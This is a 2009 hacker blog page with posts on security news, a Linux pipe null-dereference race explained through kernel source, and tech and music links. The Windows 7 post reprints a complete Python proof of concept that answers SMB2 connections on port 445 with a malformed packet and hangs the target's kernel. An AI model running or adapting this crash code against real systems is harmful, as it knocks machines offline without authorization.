search PRIV & ALL sites linked here

Friday, November 13, 2009

Windows 7 Kernel Crash bug , Microsoft "sudo" patent was bullshit , Blockhead's new album "The Music Scene"

HAPPY FRIDAY THE 13th! Just another excuse to cause digital ruckus. This lady is saying "Hmm, friday the 13th? I think i will BSOD someone's Win7 box..."

Before i get to the sudo thing, let me post some links...

This first one is a device that allows you to remotely play games on your console from your computer. pretty neat eh?
http://gizmodo.com/5359261/spawn-hd+720-is-like-a-slingbox-for-your-console-games

Next, i am sure you have all heard about the spreading iPhone worm that rick rolls you. and another worm deemed iPhone/Privacy.A, that allows an attacker to connect to a jailbroken iPhone which hasn’t had its root password changed. Fun stuff. But check this out, the author of the Rick Astley worm has been getting DEATH THREATS and job offers from the whole thing."

And for some more luls, Britneys twitter account was hacked again.

+++++

Yesterday I recv() a link to gizmodo.com claiming that Microsoft had gotten a patent for the *nix sudo(super user do) command. Of course me and others shit ourselves instantly. To no suprise this claim was a bit off balance. First of all, here is a link to the patent. and now read this to understand a little better.

"Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface identifying an account having a right to permit a task in response to the task being prohibited based on a user's current account not having that right."

"At arrow 6, user interface 116 presents a GUI to the user having at least one account with rights sufficient to permit the prohibited task. The graphical use interface may comprise one, many, or all accounts having sufficient rights. In some cases all of the accounts may be so many as to be cumbersome. In these cases, the user interface and/or rights elevator may select which to present based on various criteria, such as frequency of use, those associated with the current user, those with sufficient but not unlimited rights, and the like."

Obviously the linux/unix sudo is in no way related to a GUI, so whatever. Thanks gizmodo for the false hype! How would you have felt if someone had been murdered over this? serious biz!

Windows 7 / Server 2008R2 Remote Kernel Crash


Laurent Gaffie posted on his blog PoC code and some great information on this flaw, so no reason to re write it. Just click the link above. here is the PoC:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent GaffiƩ
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

+++++

I have to give props to my man Blockhead for his new album "The Music Scene". Blockhead used to make beats for Aesop Rock. His instrumentals are great coding/h4xing fuel and will have your brain dancing with the stars... not the terrible celebrity kind, but the ones in space. here is a **** but please buy it if you like it. I have already pre-ordered the vinyl that will be released Jan 5 of next year.

Link to AMAZON to buy the CD!

Link to other Blockhead and Aesop Rock media for sale!

and the next installment of "KewL GuY oF ThE wEeK" (extras for friday 13th)
Posted by builder at 5:14 PM 0 comments

Wednesday, November 11, 2009

Google GO Programming Language.

http://golang.org/

At first glance you might think, "wow, just another C based object-oriented programming language" but you should know by now google always steps it up. The bottom line is GO is fast as shit.

"The native Go compilers, called 6g and 8g (for 64-bit and x86), are designed to be extremely fast. There is also an alternative compiler called Gccgo that is based on the GNU Compiler Collection (GCC). The GCC-based compiler isn't as fast but is said to generate more efficient code. I was initially a bit surprised that Google chose not to use the Low-Level Virtual Machine (LLVM) compiler framework—it has a lot of LLVM expertise internally and is using it extensively for their awesome Python optimization effort. Pike says that LLVM was considered during the early stages of the Go project, but its compile-time performance was judged to be inadequate."

here is the video promo for GO!

and a news article from arstechnica.

Being Open-Source we can expect this project to grow and be a part of the mainstream very soon. I highly doubt it will disappoint.
Posted by builder at 12:10 PM 1 comments

Tuesday, November 10, 2009

Software That patches itself + CBS 60 minutes on Cyber Warfare

Okay, i am getting input from IRC so i will start posting what people are saying about this. keep brainstorming and contact me if you have any thing to add.

"By observing a program's normal behavior and assigning a set of rules, ClearView detects certain types of errors, particularly those caused when an attacker injects malicious input into a program. When something goes wrong, ClearView detects the anomaly and identifies the rules that have been violated. It then comes up with several potential patches designed to force the software to follow the violated rules. (The patches are applied directly to the binary, bypassing the source code.) ClearView analyzes these possibilities to decide which are most likely to work, then installs the top candidates and tests their effectiveness. If additional rules are violated, or if a patch causes the system to crash, ClearView rejects it and tries another."

http://www.technologyreview.com/computing/23821/

thoughts from IRC:

<@rhythmx> there are tons of auto analysis tools/ideas already... they are mostly full of fail <@rhythmx> and running that tool inline seems like a bad idea... because then you just increased the potential attack surface even more
<@rhythmx> you could maybe trick it into flagging all normal requests as evil ones and DoS all the services
+++
<@neonfreon> if your vendor sucks so bad you have to get a third party binary autopatcher you have problems
<@neonfreon> even if it's doable it's really stupid
<@neonfreon> it's a non deterministic crazy ass software modifier basically doing automated QA and bug fixes on a live, production system
<@neonfreon> that's fucking retarded
<@neonfreon> nobody wants that kind of thing in their enterprise
<@neonfreon> do that in QA labs
<@neonfreon> it has to also suffer from undecidability issues somehow
<@neonfreon> halting problem type issues
<@neonfreon> detect and fault and shutdown is all anyone wants and it's whats out there already
+++
<@jazz> as far as the self-patching thing, I think it's great for the situation they described wrt radiation potentially fucking bits
<@jazz> but if they try to apply it to commercial software I'm gonna laugh my ass off
+++
<@eliteandevil> wonder if you can make manipulate it so that it patches in a backdoor
<@eliteandevil> or makes it vuln to something
<@eliteandevil> making the unexploitable exploitable
<@jazz> I'm sure there'd be a way to poison the well
<@jazz> well remember that kernel bug a while back that only became an exploit due to compiler optimization?
<@jazz> I'm sure something similar would happen with this kinda technology


____________________________________________________________________


"Much of it was still theory, but we were told that before too long it might be possible for a hacker with a computer to disable critical infrastructure in a major city and disrupt essential services, to steal millions of dollars from banks all over the world, infiltrate defense systems, extort millions from public companies, and even sabotage our weapons systems."

this article goes on to talk about possibilities of power grids being shutdown thru cyber warfare and other complete bullshit. I think they fail to realize we got along fine before the internet. Even if attackers could compromise such things as power grids, I am sure there are fail-safe methods to put them back up manually.

heres some shit daily dave thought was WTF, and i agree.

 - "Some foreign power" was able to penetrate the Pentagon by leaving infected thumbnail drives where military
personnel would find them, and use them. On the plus side, NOW thumbdrives are banned.
- In 2007, "Some unknown foreign power" penetrated the Department of Defense, Department of State, Department of
Commerce, and they even think NASA, and stole terabytes worth of information. The method of attack wasn't disclosed as
far as I remember.
- Some medical database owned by the state of Virginia was stolen, rm'd, encrypted, and ransomed. Sean Henry, who was
describing it, didn't comment on whether or not the state actually paid the money, but his response seemed to imply
that they did.

60 Minutes link. Cyber Warfare.

Daily Daves rant
Posted by builder at 1:59 PM 0 comments

Monday, November 9, 2009

Linux kernel Pipe Null Pointer Deref race condition + Offensive-Security.com hacked

Before we get to the fun stuff, giggle at this. Offensive Security's website was hacked through a vuln in their metasploit wiki. HEH. im not going to hate too much because i love backtrack with all my heart. The attackers uploaded an ejeet PHP shell around the 6th and it went unnoticed for 28 hours. this just goes to show you that noone is safe. here is the blog post!
___
This was posted on the 3rd on Xorl, so sorry for the delay. i have to mention it because it is a really good vuln. it exists in fs/pipe.c and can be exploited similar to the Null Pointer Dereference's by spender. The routine in question is called when you open a pipe for writing, and it increments inode->i_pipe->writers to respresent how many writers there are to the pipe. here is that routine:

const struct file_operations write_pipefifo_fops = {
02. ...
03. .open = pipe_write_open,
04. ...
05.};
06. ...
07.static int
08.pipe_write_open(struct inode *inode, struct file *filp)
09.{
10. mutex_lock(&inode->i_mutex);
11. inode->i_pipe->writers++;
12. mutex_unlock(&inode->i_mutex);
13.
14. return 0;
15.}

as it says on Xorl %eax, %eax A Null pointer dereference happens when a process opens a pipe at the same time another one releases it(if the release happens first). inode->i_pipe becomes Null. here is the 3 functions that release the pipe:

01.static int
02.pipe_read_release(struct inode *inode, struct file *filp)
03.{
04. return pipe_release(inode, 1, 0);
05.}
06.
07.static int
08.pipe_write_release(struct inode *inode, struct file *filp)
09.{
10. return pipe_release(inode, 0, 1);
11.}
12.
13.static int
14.pipe_rdwr_release(struct inode *inode, struct file *filp)
15.{
16. int decr, decw;
17.
18. decr = (filp->f_mode & FMODE_READ) != 0;
19. decw = (filp->f_mode & FMODE_WRITE) != 0;
20. return pipe_release(inode, decr, decw);
21.}

and while we are ripping information fromm xorl, i guess ill post this heap overflow in Poppler PDF reader that has relatively little importance. Still a good article.
Posted by builder at 9:57 PM 0 comments

Saturday, November 7, 2009

What is this?

Posted by builder at 2:20 AM 0 comments

Friday, November 6, 2009

SSLV3 MiTM & str0ke funeral coverage.



I am sure a lot of you have had heard about these techniques, but here are 2 good links on the subject. new links added as well.

http://www.g-sec.lu/Renegotiating%20TLS.pdf

https://www.ihteam.net/blog/hacking-tutorial/tls-sslv3-man-in-the-middle-attack/
/* i am fixing the code right now, ill post the revision soon */ here it is. by knife

RIP str0ke!!!

http://www.h-i-r.net/2009/11/schrodingers-hacker.html

okay, now THIS is a bit frightening.

"In Utah, the National Security Agency is building a $2 billion storage facility that will house and analyze all forms of electronic communication...a potential yottabyte of everyone's (formerly) personal data."

btw that is 15 zeros and here is the link from gizmodo
Posted by builder at 11:53 AM 0 comments
Subscribe to: Posts (Atom)